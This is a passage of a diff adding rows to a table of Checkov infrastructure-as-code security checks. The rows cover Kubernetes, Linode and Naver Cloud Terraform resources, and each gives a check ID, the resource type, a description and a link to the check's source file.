+| 1908 | CKV_K8S_21      | resource | kubernetes_deployment                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1909 | CKV_K8S_21      | resource | kubernetes_deployment_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1910 | CKV_K8S_21      | resource | kubernetes_ingress                                      | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1911 | CKV_K8S_21      | resource | kubernetes_ingress_v1                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1912 | CKV_K8S_21      | resource | kubernetes_job                                          | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1913 | CKV_K8S_21      | resource | kubernetes_job_v1                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1914 | CKV_K8S_21      | resource | kubernetes_pod                                          | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1915 | CKV_K8S_21      | resource | kubernetes_pod_v1                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1916 | CKV_K8S_21      | resource | kubernetes_replication_controller                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1917 | CKV_K8S_21      | resource | kubernetes_replication_controller_v1                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1918 | CKV_K8S_21      | resource | kubernetes_role_binding                                 | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1919 | CKV_K8S_21      | resource | kubernetes_role_binding_v1                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1920 | CKV_K8S_21      | resource | kubernetes_secret                                       | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1921 | CKV_K8S_21      | resource | kubernetes_secret_v1                                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1922 | CKV_K8S_21      | resource | kubernetes_service                                      | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1923 | CKV_K8S_21      | resource | kubernetes_service_account                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1924 | CKV_K8S_21      | resource | kubernetes_service_account_v1                           | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1925 | CKV_K8S_21      | resource | kubernetes_service_v1                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1926 | CKV_K8S_21      | resource | kubernetes_stateful_set                                 | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1927 | CKV_K8S_21      | resource | kubernetes_stateful_set_v1                              | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1928 | CKV_K8S_22      | resource | kubernetes_deployment                                   | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 1929 | CKV_K8S_22      | resource | kubernetes_deployment_v1                                | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 1930 | CKV_K8S_22      | resource | kubernetes_pod                                          | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 1931 | CKV_K8S_22      | resource | kubernetes_pod_v1                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 1932 | CKV_K8S_24      | resource | kubernetes_pod_security_policy                          | Do not allow containers with added capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py)                                                                            |
+| 1933 | CKV_K8S_25      | resource | kubernetes_deployment                                   | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 1934 | CKV_K8S_25      | resource | kubernetes_deployment_v1                                | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 1935 | CKV_K8S_25      | resource | kubernetes_pod                                          | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 1936 | CKV_K8S_25      | resource | kubernetes_pod_v1                                       | Minimize the admission of containers with added capability                                                                                                                                               | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 1937 | CKV_K8S_26      | resource | kubernetes_deployment                                   | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 1938 | CKV_K8S_26      | resource | kubernetes_deployment_v1                                | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 1939 | CKV_K8S_26      | resource | kubernetes_pod                                          | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 1940 | CKV_K8S_26      | resource | kubernetes_pod_v1                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 1941 | CKV_K8S_27      | resource | kubernetes_daemon_set_v1                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1942 | CKV_K8S_27      | resource | kubernetes_daemonset                                    | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1943 | CKV_K8S_27      | resource | kubernetes_deployment                                   | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1944 | CKV_K8S_27      | resource | kubernetes_deployment_v1                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1945 | CKV_K8S_27      | resource | kubernetes_pod                                          | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1946 | CKV_K8S_27      | resource | kubernetes_pod_v1                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 1947 | CKV_K8S_28      | resource | kubernetes_deployment                                   | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 1948 | CKV_K8S_28      | resource | kubernetes_deployment_v1                                | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 1949 | CKV_K8S_28      | resource | kubernetes_pod                                          | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 1950 | CKV_K8S_28      | resource | kubernetes_pod_v1                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 1951 | CKV_K8S_29      | resource | kubernetes_daemon_set_v1                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1952 | CKV_K8S_29      | resource | kubernetes_daemonset                                    | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1953 | CKV_K8S_29      | resource | kubernetes_deployment                                   | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1954 | CKV_K8S_29      | resource | kubernetes_deployment_v1                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1955 | CKV_K8S_29      | resource | kubernetes_pod                                          | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1956 | CKV_K8S_29      | resource | kubernetes_pod_v1                                       | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 1957 | CKV_K8S_30      | resource | kubernetes_deployment                                   | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 1958 | CKV_K8S_30      | resource | kubernetes_deployment_v1                                | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 1959 | CKV_K8S_30      | resource | kubernetes_pod                                          | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 1960 | CKV_K8S_30      | resource | kubernetes_pod_v1                                       | Apply security context to your pods and containers                                                                                                                                                       | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 1961 | CKV_K8S_32      | resource | kubernetes_pod_security_policy                          | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py)                                                                                                    |
+| 1962 | CKV_K8S_34      | resource | kubernetes_deployment                                   | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 1963 | CKV_K8S_34      | resource | kubernetes_deployment_v1                                | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 1964 | CKV_K8S_34      | resource | kubernetes_pod                                          | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 1965 | CKV_K8S_34      | resource | kubernetes_pod_v1                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 1966 | CKV_K8S_35      | resource | kubernetes_deployment                                   | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 1967 | CKV_K8S_35      | resource | kubernetes_deployment_v1                                | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 1968 | CKV_K8S_35      | resource | kubernetes_pod                                          | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 1969 | CKV_K8S_35      | resource | kubernetes_pod_v1                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 1970 | CKV_K8S_36      | resource | kubernetes_pod_security_policy                          | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py)                                                                          |
+| 1971 | CKV_K8S_37      | resource | kubernetes_deployment                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 1972 | CKV_K8S_37      | resource | kubernetes_deployment_v1                                | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 1973 | CKV_K8S_37      | resource | kubernetes_pod                                          | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 1974 | CKV_K8S_37      | resource | kubernetes_pod_v1                                       | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 1975 | CKV_K8S_39      | resource | kubernetes_deployment                                   | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 1976 | CKV_K8S_39      | resource | kubernetes_deployment_v1                                | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 1977 | CKV_K8S_39      | resource | kubernetes_pod                                          | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 1978 | CKV_K8S_39      | resource | kubernetes_pod_v1                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                                  |
+| 1979 | CKV_K8S_41      | resource | kubernetes_service_account                              | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                              |
+| 1980 | CKV_K8S_41      | resource | kubernetes_service_account_v1                           | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                              |
+| 1981 | CKV_K8S_42      | resource | kubernetes_cluster_role_binding                         | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 1982 | CKV_K8S_42      | resource | kubernetes_cluster_role_binding_v1                      | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 1983 | CKV_K8S_42      | resource | kubernetes_role_binding                                 | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 1984 | CKV_K8S_42      | resource | kubernetes_role_binding_v1                              | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                                |
+| 1985 | CKV_K8S_43      | resource | kubernetes_deployment                                   | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 1986 | CKV_K8S_43      | resource | kubernetes_deployment_v1                                | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 1987 | CKV_K8S_43      | resource | kubernetes_pod                                          | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 1988 | CKV_K8S_43      | resource | kubernetes_pod_v1                                       | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                                  |
+| 1989 | CKV_K8S_44      | resource | kubernetes_service                                      | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                              |
+| 1990 | CKV_K8S_44      | resource | kubernetes_service_v1                                   | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                              |
+| 1991 | CKV_K8S_49      | resource | kubernetes_cluster_role                                 | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 1992 | CKV_K8S_49      | resource | kubernetes_cluster_role_v1                              | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 1993 | CKV_K8S_49      | resource | kubernetes_role                                         | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 1994 | CKV_K8S_49      | resource | kubernetes_role_v1                                      | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                              |
+| 1995 | CKV_LIN_1       | provider | linode                                                  | Ensure no hard coded Linode tokens exist in provider                                                                                                                                                     | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py)                                                                                                      |
+| 1996 | CKV_LIN_2       | resource | linode_instance                                         | Ensure SSH key set in authorized_keys                                                                                                                                                                    | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py)                                                                                              |
+| 1997 | CKV_LIN_3       | resource | linode_user                                             | Ensure email is set                                                                                                                                                                                      | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py)                                                                                                |
+| 1998 | CKV_LIN_4       | resource | linode_user                                             | Ensure username is set                                                                                                                                                                                   | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py)                                                                                          |
+| 1999 | CKV_LIN_5       | resource | linode_firewall                                         | Ensure Inbound Firewall Policy is not set to ACCEPT                                                                                                                                                      | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py)                                                                              |
+| 2000 | CKV_LIN_6       | resource | linode_firewall                                         | Ensure Outbound Firewall Policy is not set to ACCEPT                                                                                                                                                     | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py)                                                                            |
+| 2001 | CKV_NCP_1       | resource | ncloud_lb_target_group                                  | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py)                                                                 |
+| 2002 | CKV_NCP_2       | resource | ncloud_access_control_group                             | Ensure every access control groups rule has a description                                                                                                                                                | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                             |
+| 2003 | CKV_NCP_2       | resource | ncloud_access_control_group_rule                        | Ensure every access control groups rule has a description                                                                                                                                                | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                             |
+| 2004 | CKV_NCP_3       | resource | ncloud_access_control_group_rule                        | Ensure no security group rules allow outbound traffic to 0.0.0.0/0                                                                                                                                       | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py)                                                                   |
+| 2005 | CKV_NCP_4       | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22                                                                                                                                  | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py)                                                         |
+| 2006 | CKV_NCP_5       | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py)                                                     |
+| 2007 | CKV_NCP_6       | resource | ncloud_server                                           | Ensure Server instance is encrypted.                                                                                                                                                                     | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py)                                                                                         |
+| 2008 | CKV_NCP_7       | resource | ncloud_launch_configuration                             | Ensure Basic Block storage is encrypted.                                                                                                                                                                 | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py)                                                               |
+| 2009 | CKV_NCP_8       | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py)                                                                                                     |
+| 2010 | CKV_NCP_9       | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py)                                                                                                     |
+| 2011 | CKV_NCP_10      | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py)                                                                                                     |
+| 2012 | CKV_NCP_11      | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py)                                                                                                 |
